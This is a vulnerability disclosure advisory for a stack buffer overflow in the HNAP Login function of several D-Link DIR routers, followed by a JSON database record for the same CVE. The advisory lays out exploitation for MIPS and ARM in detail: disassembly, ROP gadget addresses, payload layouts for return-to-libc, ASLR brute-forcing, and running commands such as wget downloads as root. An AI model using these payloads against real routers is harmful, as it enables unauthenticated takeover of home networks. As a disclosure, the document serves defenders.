'a', 'b' and 'c' are just fillers to make up the buffer, while '1111', '2222' and '3333' will be the values of s1, s2 and s3 registers (which are not interesting for exploitation), and the rest is the ROP chain, shellcode and stack preparation routine. The only bad character that cannot be sent in the payload is the null byte as this is a str(n)cpy overflow. Up to 3350 characters can be sent, as after that it's hard to control the overflow in a reliable way. Note that all of this is to exploit the first buffer overflow with strncpy, but the second buffer overflow can be exploited in a similar way.

As explained above, due to the use of a crippled MIPS core, generic shellcodes found on the Internet will likely fail. Some very simple ones work, but the best is to craft a reliable one. The simple Metasploit bind shell also seems to work pretty reliably if no encoder is used.


ARM exploitation

The same two stack overflows affect ARM, but require less bytes to overflow the stack. The following snippet is the same part of parse_xml_value as shown for MIPS (taken from firmware 2.03b01 for the DIR-868 Rev. B): .text:00018F34 C30 LDR R1, [R11,#src] ; src .text:00018F38 C30 LDR R2, [R11,#n] ; n .text:00018F3C C30 SUB R3, R11, #-xml_tag_var .text:00018F40 C30 SUB R3, R3, #4 .text:00018F44 C30 SUB R3, R3, #4 .text:00018F48 C30 MOV R0, R3 ; dest .text:00018F4C C30 BL strncpy ; first overflow occurs here (xml_tag_var in parse_xml_stack) with 1024+ characters .text:00018F50 C30 MOV R3, #0xFFFFFBEC .text:00018F58 C30 LDR R2, [R11,#n] .text:00018F5C C30 SUB R1, R11, #-var_4 .text:00018F60 C30 ADD R2, R1, R2 .text:00018F64 C30 ADD R3, R2, R3 .text:00018F68 C30 MOV R2, #0 .text:00018F6C C30 STRB R2, [R3] .text:00018F70 C30 SUB R3, R11, #-xml_tag_var .text:00018F74 C30 SUB R3, R3, #4 .text:00018F78 C30 SUB R3, R3, #4 .text:00018F7C C30 LDR R0, [R11,#a2_ptr] ; a2_ptr is is a stack variable from hnap_main .text:00018F80 C30 MOV R1, R3 ; src .text:00018F84 C30 BL strcpy ; second overflow occurs here

The stack size will be smaller for both parse_xml_value and hnap_main when compared to the MIPS binary. Again, the strncpy overflow in parse_xml_value is the easier of the two to exploit, and here only 1024 bytes are enough to overflow the stack. As with the MIPS exploit, the only bad character is the null byte.

The affected ARM devices have a non-executable stack (NX) and 32 bit ASLR. NX can be defeated with ROP, and the 32 bit ASLR is weak - there are only 3 bytes that change in the address calculations, which means there are only 4096 possible values. The attack has to be run several times until the correct base address is hit, but this can usually be achieved in less than 1000 attempts.

The easiest attack to perform is a return-to-libc to execute a command with system(). To do this, R0 must point to the stack location where the command is before system() is called. All the affected ARM devices seem to use the same version of uClibc (libuClibc-0.9.32.1.so) for all firmware versions, which makes gadget hunting much easier and allows building an exploit that works on all the devices without any modification.

first_gadget (pops system() address into r3, and second_gadget into PC): .text:00018298 LDMFD SP!, {R3,PC}

second_gadget (puts the stack pointer into r0 and calls system() at r3): .text:00040CB8 MOV R0, SP .text:00040CBC BLX R3

system() (Executes argument in r0 (our stack pointer) .text:0005A270 system

The final Action / Username / LoginPassword / Catpcha XML parameter value will be: 'a' * 1024 + 0xffffffff + 'b' * 16 + 'AAAA' + first_gadget + system() + second_gadget + command

a / b = filler 0xffffffff = integer n (see below) AAAA = R11 first_gadget = initial PC payload = stack points here after execution of our ROP chain; it should point to whatever we want system() to execute

When the overflow happens, the stack var "n" is overwritten, which is used to calculate a memory address (see 0x18F58). In order not to crash the process before the shellcode is executed, the variable needs to be set to a numeric value that can be used to calculate a valid memory address. A good value to choose is 0xffffffff, as this will just subtract 1 from the calculated memory address and prevent an invalid memory access.

From this point onwards, it's possible to execute any command in "payload". For example, wget can be used to download a shell and execute it or a telnet server can be started. All commands will be executed as root.

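Fix: Dlink did not respond to my or CERT's request for information, so no firmware fix is available at the time of writing. Given that this vulnerability can only be exploited in the LAN, it is recommended to have a strong wireless password to prevent untrusted clients from connecting to the router. Note that a wireless password only keeps unknown clients off the network: the HNAP Login overflow requires no authentication, so any host already on the LAN (including a compromised one) can still reach it. Untrusted and guest devices should therefore be kept on a separate network segment, and the vendor's current support pages should be checked for firmware released after this advisory's date.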

References: [1] https://isc.sans.edu//diary/More+on+HNAP+-+What+is+it,+How+to+Use+it,+How+to+Find+it/17648

[2] https://en.wikipedia.org/wiki/Home_Network_Administration_Protocol [3] http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/ [4] http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/ [5] http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/ [6] https://packetstormsecurity.com/files/134370/D-Link-DIR-818W-Buffer-Overflow-Command-Injection.html [7] https://dl.packetstormsecurity.net/papers/attack/dlink_hnap_captcha.pdf [8] http://www.dlink.com/uk/en/support/support-news/2015/april/13/hnap-privilege-escalation-command-injection [9] https://github.com/rapid7/metasploit-framework/pull/7543 [10] https://www.kb.cert.org/vuls/id/677427

================ Agile Information Security Limited http://www.agileinfosec.co.uk/

Enabling secure digital business >>


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201807-0057",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-880l",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dir-868l",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dir-885l",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dir-818l\\",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dir-890l",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dir-895l",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dir-822",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dir-823",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dir-822",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-859",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-868l",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-869",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-879",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-880l",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-885l",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-890l",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-895l",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-895l",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "dlink",
        "version": "0"
      },
      {
        "model": "dir-890l",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "dlink",
        "version": "0"
      },
      {
        "model": "dir-885l",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "dlink",
        "version": "0"
      },
      {
        "model": "dir-880l",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "dlink",
        "version": "0"
      },
      {
        "model": "dir-868l",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "dlink",
        "version": "0"
      },
      {
        "model": "dir-823",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "dlink",
        "version": "0"
      },
      {
        "model": "dir-822",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "dlink",
        "version": "0"
      },
      {
        "model": "dir-818l",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "dlink",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "94130"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005757"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201611-125"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-6563"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-823_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-823:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-822_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-822:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-818l\\(w\\)_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-818l\\(w\\):-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-895l_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-895l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-890l_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-890l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-885l_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-885l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-880l_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-880l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-868l_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-868l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-6563"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Pedro Ribeiro",
    "sources": [
      {
        "db": "BID",
        "id": "94130"
      },
      {
        "db": "PACKETSTORM",
        "id": "139611"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201611-125"
      }
    ],
    "trust": 1.0
  },
  "cve": "CVE-2016-6563",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "IPA",
            "availabilityImpact": "Complete",
            "baseScore": 9.3,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "JVNDB-2016-005757",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-95383",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2016-6563",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "IPA",
            "availabilityImpact": "High",
            "baseScore": 8.1,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2016-005757",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-6563",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "IPA",
            "id": "JVNDB-2016-005757",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201611-125",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-95383",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-6563",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-95383"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-6563"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005757"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201611-125"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-6563"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Processing malformed SOAP messages when performing the HNAP Login action causes a buffer overflow in the stack in some D-Link DIR routers. The vulnerable XML fields within the SOAP body are: Action, Username, LoginPassword, and Captcha. The following products are affected: DIR-823, DIR-822, DIR-818L(W), DIR-895L, DIR-890L, DIR-885L, DIR-880L, DIR-868L, and DIR-850L. D-Link Systems, Inc. According to the reporter \u2019s report, HNAP Communication LAN This is done only on the side interface. CWE-121: Stack-based Buffer Overflow https://cwe.mitre.org/data/definitions/121.htmlOf the product LAN A third party who can access the side interface may execute arbitrary code with administrator privileges. \nAn attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. D-Link DIR-823, etc. are all wireless router products of D-Link. tl;dr\n\nA stack bof in several Dlink routers, which can be exploited by an\nunauthenticated attacker in the LAN. There is no patch as Dlink did not\nrespond to CERT\u0027s requests. As usual, a Metasploit module is in the\nqueue (see [9] below) and should hopefully be integrated soon. \n\nThe interesting thing about this vulnerability is that it affects both\nARM and MIPS devices, so exploitation is slightly different for each type. \n\nLink to CERT\u0027s advisory:\nhttps://www.kb.cert.org/vuls/id/677427\n\nLink to a copy of the advisory pasted below:\nhttps://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt\n\nHave fun. 
\n\nRegards,\nPedro\n\n\u003e\u003e Multiple vulnerabilities in Dlink DIR routers HNAP Login function\n(multiple routers affected)\n\u003e\u003e Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information\nSecurity\n==========================================================================\nDisclosure: 07/11/2016 / Last updated: 07/11/2016\n\n\u003e\u003e Background on the affected products:\n\"Smartphones, laptops, tablets, phones, Smart TVs, game consoles and\nmore a all being connected at the same time. Thatas why we created the\nnew AC3200 Ultra Wi-Fi Router. With Tri-Band Technology and speeds up to\n3.2Gbps, it delivers the necessary ultra-performance to power even the\nmost demanding connected homes, making it the best wireless home router\nfor gaming.\"\n\n\n\u003e\u003e Summary:\nDlink routers expose a protocol called HNAP (Home Network Administration\nProtocol) on the LAN interface. This is a SOAP protocol that allows\nidentification, configuration, and management of network devices. For more information regarding\nHNAP, see [1] and [2]. \n\nDlink has a long history of vulnerabilities in HNAP. Craig Heffner in\nparticular seems to have found a lot of them (see [3], [4], [5], [6],\n[7], [8]). The affected function\ncontains two subsequent stack overflows, which can be exploited by an\nunauthenticated attacker on the LAN. It affects a number of Dlink\nrouters which span the ARM and MIPS architectures. A Metasploit module\nthat exploits this vulnerability for both architectures has been\nreleased [9]. \n\nA special thanks to CERT/CC and Trent Novelly for help with disclosing\nthis vulnerability to the vendor. Please refer to CERT\u0027s advisory for\nmore details [10]. See below\nfor other constraints. 
\nAffected versions:\n  The following MIPS devices have been confirmed to be vulnerable:\n    DIR-823\n    DIR-822\n    DIR-818L(W)\n\n  The following ARM devices have been confirmed to be vulnerable:\n    DIR-895L\n    DIR-890L\n    DIR-885L\n    DIR-880L\n    DIR-868L -\u003e Rev. B and C only\n\n  There might be other affected devices which are not listed above. \n\n-----------------------\nVulnerability details and MIPS exploitation\n-----------------------\n\nThe vulnerable function, parse_xml_value (my name, not a symbol), is\ncalled from hnap_main (a symbol in the binary) in /htdocs/cgibin. \nThis function takes 3 arguments: the first is the request object /\nstring, the second is the XML tag name to be parsed inside the request,\nand the third is a pointer to where the value of that tag should be\nreturned. \n\nThe function tries to find the tag name inside the request object and\nthen extracts the tag value, copying it first to a local variable and\nthen to the third argument. This function is called from hnap_main when\nperforming the HNAP Login action to obtain the values of Action,\nUsername, LoginPassword and Catpcha from the SOAP request shown above. 
\n\nparse_xml_value(char* request, char* XMLtag, char* tag_value)\n(...)\n.text:00412264     xml_tag_value_start = $s2\n.text:00412264     xml_tag_value_end = $s1\n.text:00412264 C30                 addu    xml_tag_value_start, $v0, $s0\n # s2 now points to \u003cAction\u003e$value\u003c/Action\u003e\n.text:00412268 C30                 la      $t9, strstr\n.text:0041226C C30                 move    $a1, xml_tag_value_end  # needle\n.text:00412270 C30                 jalr    $t9 ; strstr\n.text:00412274 C30                 move    $a0, xml_tag_value_start  #\nhaystack\n.text:00412278 C30                 lw      $gp, 0xC30+var_C20($sp)\n.text:0041227C C30                 beqz    $v0, loc_4122BC\n.text:00412280 C30                 subu    xml_tag_value_end, $v0,\nxml_tag_value_start  # s1 now holds the ptr to \u003cAction\u003evalue$\u003c/Action\u003e\n.text:00412284 C30                 bltz    xml_tag_value_end, loc_4122BC\n.text:00412288 C30                 addiu   $s0, $sp, 0xC30+xml_tag_var\n.text:0041228C C30                 la      $t9, strncpy\n.text:00412290 C30                 move    $a2, xml_tag_value_end  # n\n.text:00412294 C30                 move    $a1, xml_tag_value_start  # src\n.text:00412298 C30                 addu    xml_tag_value_end, $s0,\nxml_tag_value_end\n.text:0041229C C30                 jalr    $t9 ; strncpy    # copies all\nchars in \u003cAction\u003e$value$\u003c/Action\u003e to xml_tag_var using strncpy\n.text:004122A0 C30                 move    $a0, $s0         # dest\n.text:004122A4 C30                 move    $a0, a2_ptr      # a2_ptr is\na stack variable from hnap_main (passed as third argument to\nparse_xml_value)\n.text:004122A8 C30                 lw      $gp, 0xC30+var_C20($sp)\n.text:004122AC C30                 move    $a1, $s0         # src\n.text:004122B0 C30                 la      $t9, strcpy\t# copies\nxml_tag_var into a2_ptr using strcpy\n.text:004122B4 C30                 jalr    $t9 ; strcpy     # the stack\nof the 
calling function (hnap_main) is thrashed if 2408+ bytes are sent\n.text:004122B8 C30                 sb      $zero, 0(xml_tag_value_end)\n(...)\n\nThere are two overflows, therefore two choices for exploitation:\n1) The local stack (on parse_xml_value) can be overrun with 3096+ bytes. \nThis overflow occurs even though strncpy is used, because the argument\nto strncpy is simply the strlen of the value inside the XML tag. \n2) Alternatively, it\u0027s possible to overrun the stack of the calling\nfunction (hnap_main), using only 2408+ bytes - this is because strcpy is\nused to copy the xml_tag_var onto the third argument received by\nparse_xml_value, which is a pointer to a stack variable in hnap_main. \n\nExploiting 1) is easier, and the following example will explain how. \n\nAll the affected MIPS devices use the same version of uClibc\n(libuClibc-0.9.30.3.so) and seem to load it at 0x2aabe000, which makes\nexploitation trivial for all firmware versions. It should be noted that\nthe MIPS devices use the RTL8881a CPU, which is based on a Lextra\nRLX5281 core. The Lextra RLX cores are MIPS clones, but they\u0027re bit\ncrippled as they are lacking a few load and store instructions. For this\nreason, some generic shellcodes that work on MIPS might not work on\nthese CPUs (especially when obfuscated). \n\nThe devices also do not have NX, ASLR nor any other modern memory\nprotections, so the shellcode is executed directly on the stack. \nHowever, it\u0027s necessary to use ROP to prepare the stack for execution,\nwhich can be executed with gadgets taken from libuClibc-0.9.30.3.so. \nDue to the way MIPS CPUs work, it\u0027s necessary to flush the CPU cache\nbefore executing the exploit. This can be forced by calling sleep() from\nlibc (refer to\nhttp://blog.emaze.net/2011/10/exploiting-mips-embedded-devices.html for\nan explanation on the MIPS CPU caches). 
\n\nSo the ROP chain and shellcode will look like:\n\nfirst_gadget - execute sleep and call second_gadget\n.text:0004EA1C                 move    $t9, $s0 \u003c- sleep()\n.text:0004EA20                 lw      $ra, 0x20+var_4($sp) \u003c- second_gadget\n.text:0004EA24                 li      $a0, 2 \u003c- arg for sleep()\n.text:0004EA28                 lw      $s0, 0x20+var_8($sp)\n.text:0004EA2C                 li      $a1, 1\n.text:0004EA30                 move    $a2, $zero\n.text:0004EA34                 jr      $t9\n.text:0004EA38                 addiu   $sp, 0x20\n\nsecond_gadget - puts stack pointer in a1:\n.text:0002468C                 addiu   $s1, $sp, 0x58\n.text:00024690                 li      $s0, 0x44\n.text:00024694                 move    $a2, $s0\n.text:00024698                 move    $a1, $s1\n.text:0002469C                 move    $t9, $s4\n.text:000246A0                 jalr    $t9\n.text:000246A4                 move    $a0, $s2\n\nthird_gadget - call $a1 (which now has the stack pointer):\n.text:00041F3C                 move    $t9, $a1\n.text:00041F40                 move    $a1, $a2\n.text:00041F44                 addiu   $a0, 8\n.text:00041F48                 jr      $t9\n.text:00041F4C                 nop\n\nWhen the crash occurs, the stack pointer is at xml_tag_value[3128]. In\norder to have a larger space for the shellcode (3000+ bytes), it\u0027s\npossible to jump back to xml_tag_value[0]. 
